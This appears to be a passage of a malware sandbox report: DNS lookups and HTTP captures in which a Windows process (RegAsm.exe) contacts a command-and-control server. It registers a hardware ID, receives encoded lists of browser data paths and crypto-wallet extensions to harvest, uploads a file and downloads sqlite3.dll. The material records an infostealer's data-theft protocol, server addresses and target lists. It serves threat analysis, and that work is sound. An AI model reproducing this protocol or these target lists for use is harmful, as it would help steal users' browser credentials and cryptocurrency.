Sep 27, 2024 00:15:32.245177984 CEST	1.1.1.1	192.168.2.5	0xc3ae	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:32.245177984 CEST	1.1.1.1	192.168.2.5	0xc3ae	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:32.245177984 CEST	1.1.1.1	192.168.2.5	0xc3ae	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:36.708045959 CEST	1.1.1.1	192.168.2.5	0x49d	No error (0)	hansgborn.eu	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:36.708045959 CEST	1.1.1.1	192.168.2.5	0x49d	No error (0)	hansgborn.eu	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:41.461694002 CEST	1.1.1.1	192.168.2.5	0xe47d	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:27.178311110 CEST	1.1.1.1	192.168.2.5	0x96f9	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:29.580132008 CEST	1.1.1.1	192.168.2.5	0x4458	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:45.793597937 CEST	1.1.1.1	192.168.2.5	0x432c	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	46.8.231.109	80	5280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:14:58.352767944 CEST	87	OUT	GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:14:58.969877958 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:14:58.973582983 CEST	412	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 46.8.231.109 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 37 46 37 44 42 41 32 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="hwid"A897F7DBA218194301792------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="build"default------KFHCAEGCBFHJDGCBFHDA--
Sep 27, 2024 00:14:59.183753967 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 44 59 78 59 54 4d 77 5a 6d 59 34 59 32 45 35 4d 7a 41 30 5a 6a 4d 77 4d 6a 4d 30 59 54 4e 6c 4d 6a 67 35 4e 7a 49 34 59 32 55 31 59 6a 6c 6b 5a 6a 41 7a 59 57 4d 31 4f 47 59 7a 5a 47 49 33 59 32 51 32 4e 7a 67 33 4e 6a 55 30 4e 54 55 30 5a 57 4a 6d 59 57 45 79 4d 44 52 69 4d 6a 51 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MDYxYTMwZmY4Y2E5MzA0ZjMwMjM0YTNlMjg5NzI4Y2U1YjlkZjAzYWM1OGYzZGI3Y2Q2Nzg3NjU0NTU0ZWJmYWEyMDRiMjQ0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 27, 2024 00:14:59.185915947 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 2d 2d 0d 0a Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="message"browsers------IIIDAKJDHJKFHIEBFCGH--
Sep 27, 2024 00:14:59.363838911 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 27, 2024 00:14:59.363856077 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 27, 2024 00:14:59.365458965 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"plugins------CGHCGIIDGDAKFIEBKFCF--
Sep 27, 2024 00:14:59.543374062 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 27, 2024 00:14:59.543394089 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 27, 2024 00:14:59.543462992 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 27, 2024 00:14:59.543473005 CEST	224	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxH
Sep 27, 2024 00:14:59.543867111 CEST	1236	IN	Data Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32 Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
Sep 27, 2024 00:14:59.543879032 CEST	1236	IN	Data Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32 Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
Sep 27, 2024 00:14:59.543890953 CEST	448	IN	Data Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
Sep 27, 2024 00:14:59.545854092 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 27, 2024 00:14:59.545986891 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Sep 27, 2024 00:14:59.547557116 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 2d 2d 0d 0a Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="message"fplugins------AFHDHCAAKECFIDHIEBAK--
Sep 27, 2024 00:14:59.725159883 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 27, 2024 00:14:59.741317034 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA Host: 46.8.231.109 Content-Length: 7107 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:14:59.741386890 CEST	7107	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 27, 2024 00:14:59.939654112 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:14:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:14:59.943234921 CEST	91	OUT	GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:00.117306948 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:00 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 